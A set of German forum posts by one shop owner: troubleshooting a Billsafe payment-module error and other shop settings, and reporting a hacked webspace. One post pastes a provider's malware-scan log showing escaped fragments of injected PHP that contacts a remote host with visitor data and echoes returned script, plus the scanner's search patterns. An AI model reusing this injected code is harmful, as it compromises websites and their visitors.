zum Test habe ich mir den Shop nochmal neu runtergeladen (v2next 2.5.10) und in einen Unterordner hochgeladen und das Modul "billsafe_3_invoice" installiert - sandbox aktiviert - ID und Licence eingetragen - und eine Bestellung mit Paul Positiv durchgeführt. Ergebnis: genau das gleiche.
Folgende Tabellen sind vorhanden: billsafe_directpayments (ist leer), billsafe_paymentinfo (ist leer), billsafe_products_shipped (ist leer), orders_billsafe (da ist die Bestellung drin).
Ansonsten genau dasselbe Problem - Abfrage wird abgebrochen aber Bestellung im Backend und bei Billsafe vorhanden - im Backend allerdings kein "Billsafe Details Button".
Beiträge von Andrea
-
-
habe qf9 deinstalliert und die Dateien noch mal hochgeladen und dann neu installiert (dann auch gleich noch qf10) und dann das Modul billsafe_3_invoice neu installiert aber keine änderung.
-
Also habe das Modul deinstalliert und wieder neu installiert aber bei mir ändert sich nicht - alles wie gehabt. Immernoch dieselbe Fehlermeldung und auch weiterhin kein Billsafe-Details Button. Sollte ich qf9 vielleicht vorher auch noch mal deinstallieren?
-
Hallo..habe einen 5 Euro Rabatt Coupon erstellt, der auch im Shop abgezogen wird aber bei Zahlung per Sofortüberweisung wird dieser Rabatt nicht berücksichtigt. Dem Kunden wurde da der volle Preis abgezogen.
-
man hat eine VID und eine Lizenznummer und die stimmen und sind auch korrekt hinterlegt. Die Testbestellungen landen ja auch bei Billsafe und auch im Shop aber es kommt halt immer diese Meldung und im Shop Backend wo die Testbestellung zwar drin ist, fehlt der Button mit den Billsafe-Details.
-
habe deine Datei mit meiner vergleichen und sie sind gleich. habe es jetzt nochmal versucht mit aktivem payment-layer - da bekomme ich dann bei der "checkout_billsafe.php" den layer wo ich nochmal das Geburtsdatum eintragen muss und den Kauf bestätigen muss und als nächstes wird ein "token" an die "checkout_billsafe.php" angehängt und da habe ich die Fehlernachricht.
-
das billsafe problem habe ich aber immernoch - bei allen shops dasselbe. immer bei der checkout_billsafe.php kommt die meldung. und beide shops sind bei 2.5.9
-
also bisher ist auch nix weiter passiert. weder bei mir, noch bei meinem bekannten. scheint jetzt alles ok zu sein.
-
hab ich schon gemacht - ändert nichts.
-
kein wordpress - nirgendwo. tja, und der ecb shop war so alt - da gab es schon ewig keine updates dafür.
habe jetzt auch mit meinem provider telefoniert und eine der infizierten php - dateien prüfen lassen und der hat es dann auch gefunden und sagte das es am 19ten eingespielt wurde aber du hast mich schon am 18ten gewarnt.und das
Changed -> 29.08.2014 03:47:46 +0200bedeutet nur soviel das um diese uhrzeit der provider meines bekannten die infizierten dateien entdeckt hat und die seite gesperrt - ist jetzt aber wieder frei nachdem ich den code von den dateien entfernt habe.
ich habe jetzt mal alle ftp-passwörter und sql-passwörter geändert. ob das reichen wird ist fraglich.
mein pc ist jedenfalls sauber. -
ne nur eine webspace.
witzig ist ja...den shop habe ich ja auf meiner domain (auch webspace) fertig gemacht und liegt danoch und ist auch immernoch aufrufbar.
vor zwei tagen dann auf seine domain hochgeladen (auch webspace) und da nicht mehr aufrufbar.und noch was....nachdem ich nun alle infizierten dateien mit den original dateien verglichen habe, muss ich feststellen, das von seinem provider auch dateien beanstandet wurden, die im vergleich zum original nicht verändert wurden wie zb. folgendes:
Changed -> 29.08.2014 03:47:46 +0200
Zeile -> SuchMuster -> FUND (Max. 300 Zeichen, gekuerzt, escaped..., angezeigt maximal: 20)
598 -> WARNING: Port Binding -> \$this-\>debug\("getOperationscheckingport\$portbindingType".\$portData\['bindingType'\]\)\;
602 -> WARNING: Port Binding -> \$this-\>debug\("getOperationsfoundport\$portbindingType\$bindingType"\)\; -
ja, leider. versteh ich jetzt aber auch nicht. infiziert war eigentlich nur sein alter shop auf seiner domain...ich habe dann den neuen shop auf einem unterordner meiner domain erstellt. wie kann ich da was mitgenommen haben?
-
folgendes...der Shop (bzw. die Domain) eines Freundes war infiziert ....war ein alter ecb-shop drauf - also neuen shop gemacht (v2next) und diese woche von do auf fr nacht auf den server geladen.....alles war soweit ok bis jetzt...nun ist die seite nicht verfügbar und der provider hat eine infiziert.txt - Datei in den shop-Ordner gelegt wo jetzt zb. folgendes drin steht:
Changed -> 29.08.2014 00:25:46 +0200
Zeile -> SuchMuster -> FUND (Max. 300 Zeichen, gekuerzt, escaped..., angezeigt maximal: 20)
32 -> error_reporting(0); ini... -> error_reporting\(0\)\;ini_set\('display_errors',0\)\;\$wp_ob80=@\$_SERVER\['HTTP_USER_AGENT'\]\;
33 -> if (( preg_match ('/Gec... -> if\(\(preg_match\('/Gecko\|MSIE/i',\$wp_ob80\)\&\&!preg_match\('/bot/i',\$wp_ob80\)\)\)\{
33 -> if (( preg_match (./Gec... -> if\(\(preg_match\('/Gecko\|MSIE/i',\$wp_ob80\)\&\&!preg_match\('/bot/i',\$wp_ob80\)\)\)\{
33 -> if (( preg_match (./Gec... -> if\(\(preg_match\('/Gecko\|MSIE/i',\$wp_ob80\)\&\&!preg_match\('/bot/i',\$wp_ob80\)\)\)\{
34 -> "http://".".*".".*"."..... -> \$wp_ob0980="http://"."html"."string".".com/string"."/\?ip=".\$_SERVER\['REMOTE_ADDR'\]."\&referer=".urlencode\(\$_SERVER\['HTTP_HOST'\]\)."\&ua=".urlencode\(\$wp_ob80\)\;
34 -> $wp_.*="http://.*?ip=.*... -> \$wp_ob0980="http://"."html"."string".".com/string"."/\?ip=".\$_SERVER\['REMOTE_ADDR'\]."\&referer=".urlencode\(\$_SERVER\['HTTP_HOST'\]\)."\&ua=".urlencode\(\$wp_ob80\)\;
36 -> curl_setopt ($.*, CURLO... -> curl_setopt\(\$ch,CURLOPT_TIMEOUT,6\)\;curl_setopt\(\$ch,CURLOPT_RETURNTRANSFER,1\)\;\$wp_80ob=curl_exec\(\$ch\)\;curl_close\(\$ch\)\;\}
37 -> if ( substr(.*,.*,.*) =... -> if\(substr\(\$wp_80ob,1,3\)==='scr'\)\{echo\$wp_80ob\;\}
37 -> if ( substr($wp_.*,.*,.... -> if\(substr\(\$wp_80ob,1,3\)==='scr'\)\{echo\$wp_80ob\;\}nun werde ich das alles löschen, also die texte aus den betroffenen dateien aber meine frage ist..
wie kann ich das in zukunft vermeiden?
der provider meinte nur soviel wie "das käme öfter vor bei seinen kunden, deshalb sollte man immer seine software auf dem neuesten stand halten usw. und wenn eine domain im visier sei, dann würden sie da halt auch immer eine lücke finden"...was soll ich denn mit der aussage anfangen? -
-
ja, das billsafe_3_invoice habe ich auch aktiviert aber bei mir geht es nicht. shop 2.5.8.
-
ah ok - danke. hoffe das wird sich bald klären. danke nochmal.
-
also ich habe das problem mit beiden v2next shops - bei beiden shops kommt an derselben stelle oben erwähnte fehlermeldung.
-
nachdem ich auf "zahlungspflichtig bestellen" klicke, komme ich zur Billsafe Sandbox Vorschau und nachdem ich da den Button "Rechnungskauf bestätigen" klicke, kommt eine weiße Seite mit dem Text "Die Abfrage wurde abgebrochen, kontaktieren Sie den Administrator..." - keine weitere Info
-
Hallo, Billsafe im Testmodus beim Kauf mit Paul Positiv kam folgender Text "Die Abfrage wurde abgebrochen, kontaktieren Sie den Administrator..."
Die Bestellung ist allerdings beim Billsafe Händlerportal zu finden und im Shop Backend auch - allerdings ohne den Button "Billsafe Details".Wieso kommt der Text "Die Abfrage wurde abgebrochen, kontaktieren Sie den Administrator..."?
-
nun hat der slider die richtige größe. hatte zuvor die full size einstellung auf "nein" und das war es. nun steht es auf "ja" und die größe hat sich der verfügbaren breite angepasst.